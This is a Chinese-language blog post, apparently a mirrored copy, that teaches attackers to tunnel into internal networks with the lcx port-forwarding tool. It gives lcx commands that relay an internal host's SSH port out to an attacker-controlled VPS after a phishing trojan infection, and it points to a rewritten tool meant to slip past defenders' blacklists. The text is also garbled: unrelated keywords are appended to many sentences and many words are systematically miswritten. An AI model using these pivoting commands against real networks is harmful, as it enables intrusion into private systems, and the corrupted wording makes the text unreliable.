前言
今天开始讲讲木马攻防,感受这些内容你们应该会更感兴趣一些,就从隧道木马提及。为何会有隧道木马这一说呢?这是根据通讯协议进行分类的。讲隧道木马以前,先讲讲端口映射和转发。端口映射和端口转发实际上是一回事,原理是同样的,因为应用场景不一样,才产生了不一样的含义。linux
场景1 端口映射
端口映射的使用,如下图为例,这是一个在渗透测试中,比较常见的场景。
一个hacker经过扫描暴露到公网中的主机A ,主机A开放了一些敏感端口,并且是弱口令,致使主机A被hacker彻底控制。github
接着hacker就想往公司内网中渗透,经过在主机A监控流量或者扫描的方式,发现了主机B,可是主机B只能由主机A进行访问,开放了80端口,并且没有公网ip。golang
若是hacker想直接访问主机B的 80端口,对上面的Web服务进行继续渗透,这就须要进行端口映射,让hacker能够远程链接到80端口。shell
从上图场景中看,端口映射是将内网主机B的80端口映射到了具备公网ip的主机A上,本质上是将一个原本没法访问的端口映射到能够访问的ip上了。windows
场景2 端口转发
端口转发又是另一个场景,在渗透测试中,也很常见。以下图所示。
-
hacker位于主机A,主机A多是我的电脑,也多是hacker控制的主机。
-
hacker经过发送恶意邮件的方式给主机B,主机B的用户点开邮件,运行恶意木马致使主机B被感染,就成了咱们俗称的“肉鸡”。虽然已经有木马运行在主机B中,可是因为主机B不在公网中,hacker没法访问到主机B。ssh
-
主机B运行着ssh服务,开放着22端口,hacker若是想在主机A上直接链接主机B的22端口,执行shell命令,这就须要端口转发。机器学习
那么木马怎么实现端口转发,才能让hacker访问主机B的22端口呢? 这就须要一台主机C,一个公网的VPS,去阿里云或者腾讯云买。木马的服务端运行在主机C,同时监听两个端口 port1 与port2,木马的客户端运行在主机B,分别主动链接主机B的22端口和主机C的port2,而hacker只须要主动链接主机C的port1,这样就打通了到主机B 22端口的线路。以下图所示。
lcx是一款内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口。这个工具很早就已经有了,如今已经有跨平台的了,支持在windows、linux下使用。还有一些根据lcx源码开发的其余版本,好比jsp版,http隧道版等等。代码以下:
https://github.com/windworst/LCX/
下面说一下它的使用以及功能说明:
Usage of Packet Transmit:
./lcx -<listen|tran|slave> [<-log|-hex|-text> file]
./lcx -about
[options:]
-listen
-tran
-slave
-hex : hex mode data dump
-text : text mode data dump
-log : save transfer log
对于场景1,可使用lcx的tran模式来实现。假设主机A 公网ip 10.10.10.1,主机B 内网ip为192.168.1.5,开放80端口。 在主机A上运行 :
./lcx -tran 8080 192.168.1.5 80
这个时候,hacker只要链接到主机A的8080端口,便可访问到主机B的80端口。
对于场景2,使用lcx的listen和slave模式来实现。假设主机C 公网ip 10.10.10.1,主机B 内网ip为192.168.1.5,开放22端口。 在主机C上监听8080和8081端口:
./lcx -listen 8080 8081
在主机B上链接22端口,并链接主机C的8081端口:
./lcx -slave 192.168.1.5 22 10.10.10.1 8081
这个时候,hacker只须要链接ip10.10.10.1的8080端口,便可直接链接到22端口,执行命令。
取代lcx
使用工具很简单,可是对这些工具的封锁也很简单。这些开源的网络安全工具早就处于防护端的黑名单里。所以本身写一个相似的工具也是一项必备的能力。 在github中就有这样相似的项目:
https://github.com/cw1997/NATBypass
代码很简单,只是单个golang文件,仿照lcx是实现了listen,tran和slave功能。关键的代码很简单,对应了下图中三个红框圈住的三个函数。
最后
关注公众号:七夜安全博客
原文 https://www.cnblogs.com/qiyeboy/p/10350621.html
二联 http://www.noobyard.com/link?url=https://www.cnblogs.com/qiyeboy/p/10350621.html